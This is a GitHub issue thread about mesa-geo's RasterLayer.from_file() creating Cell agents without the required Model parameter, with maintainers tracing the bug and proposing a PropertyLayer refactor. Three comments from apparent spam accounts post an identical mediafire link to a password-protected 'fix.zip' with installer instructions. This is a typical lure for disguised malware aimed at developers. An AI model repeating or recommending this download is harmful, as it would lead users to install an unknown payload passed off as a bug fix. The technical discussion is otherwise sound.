### ISSUE TITLE
RasterLayer creates Cells, Cells inherit from Agents, Agents need model input, but RasterLayer doesn't have access to model

### ISSUE THREAD

**Issue by EwoutH** [projectmesa/mesa-geo#236]
Currently, Mesa-Geo can create agents in it's RasterLayer's from_file() method.

https://github.com/projectmesa/mesa-geo/blob/9c3196c932be94fdc6ead4a599740445c56d63bd/mesa_geo/raster_layers.py#L556

To create an Mesa Agent, you are required to pass a Model parameter:

https://github.com/projectmesa/mesa/blob/0b2d250cf2d3be79b266a04c0c91612880e28f0a/mesa/agent.py#L40

However, the `RasterLayer` or it's `from_file()` method don't have access to a Model variable.

<hr>

Why this previously worked, I don't know exactly. I think because there was previously a "hack" in which you inherited from Agent, but not properly set the agent up with `super().__init__()`.

I think this might require a rethink about how Cells integrate with the Mesa (with the AgentSet and experimental cell_space specifically.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EwoutH** [comment]
(I deleted two spam posts from spam bots)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wang-boyu** [comment]
It's probably introduced as mentioned here: https://github.com/projectmesa/mesa-geo/pull/212/files#r1730417300

A `model` parameter was added to class constructor, but it wasn't added here, in the `from_file` class method:

https://github.com/projectmesa/mesa-geo/blob/9c3196c932be94fdc6ead4a599740445c56d63bd/mesa_geo/raster_layers.py#L556

Moving forward, it's better to refactor `RasterLayer` based on `PropertyLayer` as mentioned in this ticket https://github.com/projectmesa/mesa-geo/issues/201.

But I'll submit a fix for this first.

**Comment by EwoutH** [comment]
Thanks for looking into this!

It sparked me to finally write up an example model using the PropertyLayer: https://github.com/projectmesa/mesa-examples/pull/182
